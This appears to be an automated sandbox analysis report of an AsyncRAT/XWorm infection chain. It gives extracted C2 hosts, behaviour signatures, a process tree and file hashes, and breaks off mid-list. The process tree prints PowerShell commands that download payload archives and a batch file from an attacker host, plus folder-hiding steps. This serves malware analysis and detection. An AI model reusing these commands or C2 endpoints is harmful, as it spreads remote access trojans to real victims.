Analysis

  • max time kernel
    496s
  • max time network
    513s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-07-2024 17:19

General

  • Target

    http://ride-fatal-italic-information.trycloudflare.com

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

todfg.duckdns.org:6745

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

xworm

Version

3.1

C2

welxwrm.duckdns.org:8292

xwor3july.duckdns.org:9402

Mutex

jAJi0qnpBIvDTnnL

Attributes
  • install_file

    USB.exe

aes.plain
aes.plain

Extracted

Family

xworm

Version

5.0

C2

rvxwrm5.duckdns.org:9390

Mutex

paSw6o6yxKyyWEhP

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

asyncrat

Botnet

Default

C2

anachyyyyy.duckdns.org:7878

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Xworm Payload 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 42 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 34 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 41 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3552
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://ride-fatal-italic-information.trycloudflare.com
        2⤵
        • Enumerates system info in registry
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1912
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc071346f8,0x7ffc07134708,0x7ffc07134718
          3⤵
            PID:4296
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
            3⤵
              PID:1436
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:5112
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:8
              3⤵
                PID:244
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
                3⤵
                  PID:4828
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
                  3⤵
                    PID:2312
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 /prefetch:8
                    3⤵
                      PID:2188
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 /prefetch:8
                      3⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2912
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
                      3⤵
                        PID:4228
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
                        3⤵
                          PID:2116
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
                          3⤵
                            PID:4348
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
                            3⤵
                              PID:4364
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3280 /prefetch:8
                              3⤵
                                PID:2340
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5556 /prefetch:8
                                3⤵
                                • Modifies registry class
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of SetWindowsHookEx
                                PID:4688
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
                                3⤵
                                  PID:712
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6108 /prefetch:8
                                  3⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:516
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4000 /prefetch:1
                                  3⤵
                                    PID:952
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1
                                    3⤵
                                      PID:5048
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=6352 /prefetch:6
                                      3⤵
                                        PID:1964
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4928 /prefetch:2
                                        3⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4016
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,651008892731098067,1173605616096346322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
                                        3⤵
                                          PID:4584
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\new.bat" "
                                        2⤵
                                          PID:1412
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ride-fatal-italic-information.trycloudflare.com/kbsfaw.pdf
                                            3⤵
                                              PID:1732
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xf8,0x12c,0x7ffc071346f8,0x7ffc07134708,0x7ffc07134718
                                                4⤵
                                                  PID:3548
                                              • C:\Windows\system32\timeout.exe
                                                timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
                                                3⤵
                                                • Delays execution with timeout.exe
                                                PID:392
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ride-fatal-italic-information.trycloudflare.com/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"
                                                3⤵
                                                • Blocklisted process makes network request
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1224
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
                                                3⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3720
                                              • C:\Windows\system32\timeout.exe
                                                timeout /t 5 REM Wait for extraction to finish (adjust timeout as needed)
                                                3⤵
                                                • Delays execution with timeout.exe
                                                PID:2920
                                              • C:\Windows\system32\attrib.exe
                                                attrib +h "C:\Users\Admin\Downloads\Python"
                                                3⤵
                                                • Views/modifies file attributes
                                                PID:2568
                                              • C:\Users\Admin\Downloads\Python\Python312\python.exe
                                                python.exe money.py
                                                3⤵
                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                PID:2076
                                              • C:\Users\Admin\Downloads\Python\Python312\python.exe
                                                python.exe moment.py
                                                3⤵
                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                PID:2580
                                              • C:\Users\Admin\Downloads\Python\Python312\python.exe
                                                python.exe update.py
                                                3⤵
                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                PID:2592
                                              • C:\Users\Admin\Downloads\Python\Python312\python.exe
                                                python.exe upload.py
                                                3⤵
                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                PID:404
                                              • C:\Users\Admin\Downloads\Python\Python312\python.exe
                                                python.exe time.py
                                                3⤵
                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                PID:1908
                                              • C:\Users\Admin\Downloads\Python\Python312\python.exe
                                                python.exe kam.py
                                                3⤵
                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                PID:1736
                                              • C:\Users\Admin\Downloads\Python\Python312\python.exe
                                                python.exe momentomo.py
                                                3⤵
                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                PID:1180
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ride-fatal-italic-information.trycloudflare.com/kbsfaw.pdf
                                                3⤵
                                                  PID:876
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc071346f8,0x7ffc07134708,0x7ffc07134718
                                                    4⤵
                                                      PID:1884
                                                  • C:\Windows\system32\timeout.exe
                                                    timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
                                                    3⤵
                                                    • Delays execution with timeout.exe
                                                    PID:3276
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ride-fatal-italic-information.trycloudflare.com/startupppp.bat' -OutFile 'C:\Users\Admin\Downloads\startupppp.bat' }"
                                                    3⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3804
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ride-fatal-italic-information.trycloudflare.com/FTSP.zip' -OutFile 'C:\Users\Admin\Downloads\FTSP.zip' }"
                                                    3⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3140
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\FTSP.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
                                                    3⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3424
                                                  • C:\Windows\system32\attrib.exe
                                                    attrib +h "C:\Users\Admin\Downloads\Print"
                                                    3⤵
                                                    • Views/modifies file attributes
                                                    PID:848
                                                • C:\Windows\System32\notepad.exe
                                                  C:\Windows\System32\notepad.exe
                                                  2⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3968
                                                • C:\Windows\System32\notepad.exe
                                                  C:\Windows\System32\notepad.exe
                                                  2⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1392
                                                • C:\Windows\System32\notepad.exe
                                                  C:\Windows\System32\notepad.exe
                                                  2⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:3168
                                                • C:\Windows\System32\notepad.exe
                                                  C:\Windows\System32\notepad.exe
                                                  2⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:3792
                                                • C:\Windows\System32\notepad.exe
                                                  C:\Windows\System32\notepad.exe
                                                  2⤵
                                                    PID:1868
                                                  • C:\Windows\System32\notepad.exe
                                                    C:\Windows\System32\notepad.exe
                                                    2⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:464
                                                  • C:\Windows\System32\notepad.exe
                                                    C:\Windows\System32\notepad.exe
                                                    2⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:4776
                                                • C:\Windows\System32\CompPkgSrv.exe
                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                  1⤵
                                                    PID:404
                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                    1⤵
                                                      PID:1960
                                                    • C:\Windows\System32\rundll32.exe
                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                      1⤵
                                                        PID:2196

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                        Filesize

                                                        2KB

                                                        MD5

                                                        2f57fde6b33e89a63cf0dfdd6e60a351

                                                        SHA1

                                                        445bf1b07223a04f8a159581a3d37d630273010f

                                                        SHA256

                                                        3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                        SHA512

                                                        42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\26d29839-6a9d-48f9-a3bb-3cd8748b6b39.tmp

                                                        Filesize

                                                        12KB

                                                        MD5

                                                        cdab6e3c5ee45e6fa26b012d40cc7b80

                                                        SHA1

                                                        c0b7ab106d2d892893d6138604fd400ec6d64522

                                                        SHA256

                                                        915553942ae3e1867b000ce8250710ea4c0984a826123cb605e7ebc41ee2bb4c

                                                        SHA512

                                                        79bfcffe27f8f292fa9880aa24c181ffbe3492f4d778a19270cbd09ea1cda4adb88f5828c35fa2d3541bef5123e70dc98646ba4d517da08dac5a5ce5e093b455

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                        Filesize

                                                        152B

                                                        MD5

                                                        eaaad45aced1889a90a8aa4c39f92659

                                                        SHA1

                                                        5c0130d9e8d1a64c97924090d9a5258b8a31b83c

                                                        SHA256

                                                        5e3237f26b6047f64459cd5d3a6bc3563e2642b98d75b97011c93e0a9bd26f3b

                                                        SHA512

                                                        0db1c6bdb51f4e6ba5ef4dc12fc73886e599ab28f1eec5d943110bc3d856401ca31c05baa9026dd441b69f3de92307eb77d93f089ba6e2b84eea6e93982620e4

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                        Filesize

                                                        152B

                                                        MD5

                                                        3ee50fb26a9d3f096c47ff8696c24321

                                                        SHA1

                                                        a8c83e798d2a8b31fec0820560525e80dfa4fe66

                                                        SHA256

                                                        d80ec29cb17280af0c7522b30a80ffa19d1e786c0b09accfe3234b967d23eb6f

                                                        SHA512

                                                        479c0d2b76850aa79b58f9e0a8ba5773bd8909d915b98c2e9dc3a95c0ac18d7741b2ee571df695c0305598d89651c7aef2ff7c2fedb8b6a6aa30057ecfc872c5

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                        Filesize

                                                        72B

                                                        MD5

                                                        b9a873ce4127661883497a3418478528

                                                        SHA1

                                                        33aa6cb04fcf1cfafb880cbf374bae25465a0a39

                                                        SHA256

                                                        8f2e8f21029eb73a9a7a5e34711f386e6a6eb531240ac9721693a837ce90f6b7

                                                        SHA512

                                                        6af0cdc06a28ccc060258f5aa2ec5b0f0c1534f0d91a99de6a5aa38145ce969c3fd9f27e3deb66417f423c6831b70722db6aa3d9e2f07bc077352fde50e14f28

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                        Filesize

                                                        72B

                                                        MD5

                                                        f1c3eedaf957664b13a82e8f08db76ef

                                                        SHA1

                                                        0db915c24d8b9dab93cb57fbc041c1dba0de8090

                                                        SHA256

                                                        8076cf8c8bea5a4b2804d7aab1be89c33b7b0dee2143f939937485bd551a3739

                                                        SHA512

                                                        8f72e4a39f5669c265e77dc610df9fbfbf3b97400c8c9f9e314346b75f07e6a229fbe2cf194120be449fd159bd65a7925bae23f1498ba57d255b6336378f2881

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                        Filesize

                                                        215B

                                                        MD5

                                                        fd4066e2418c0deeec9204af84eea78b

                                                        SHA1

                                                        fa35670e73bbaec1de3e0bcd6538b4c27ecc28a7

                                                        SHA256

                                                        9cc46e2af66764eb23ce6b4a23c12c3f65f8012061d1f4b3971e738103ffe438

                                                        SHA512

                                                        fce8c591736546977c180a69b9eac774dcc861b793b9e1668aa4a50ebd0091547af097222c58c9c4820523685386ff0ab6418a8a78b109c0ff7b6deccc36724c

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                        Filesize

                                                        6KB

                                                        MD5

                                                        c713021d2670b78ff8bcd3236fb0e03b

                                                        SHA1

                                                        3a3fdf0ccca74f1330da203934689c8fe511ec16

                                                        SHA256

                                                        16005aeece8be71dc0eb6810fef522c9a060bb7da2eaa669576294453822478c

                                                        SHA512

                                                        53934662c57b5dcd3fa28fd5b7ead3f41c07addc60cc3f0c3d5dadce4a94c93c4d4a0744ea8c63c0ec885ab3d28e6bff8a54a24f1fac611ada0c722fb1b7b47d

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                        Filesize

                                                        6KB

                                                        MD5

                                                        d44fdd0fe8396099fdcfbb8ed3535aee

                                                        SHA1

                                                        5c8fff6de50bf55be9c209013b7d0a1e2aad6211

                                                        SHA256

                                                        fb809079129a7a54e3103d94113de1c2947ef43e540ee2fa45711c0b80d1b47b

                                                        SHA512

                                                        3b2d6e4c6f06f683699d1e043a1353ba69e11f38162941853b9e3949c579f1959fe0950fcbd3f3efd44cec94f4b2ba2ca3eca07eb56a5bf614d1d8cb244a26f9

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                        Filesize

                                                        6KB

                                                        MD5

                                                        8ad1864d6fe34ff4a6135ead038bd77e

                                                        SHA1

                                                        c3f00337d7cc99efc1d5963205bddb67bccc8237

                                                        SHA256

                                                        9fa3aada5a41fa6b0ea581057fe7e63a6092e8d6b954ba93fa34691b4fc56400

                                                        SHA512

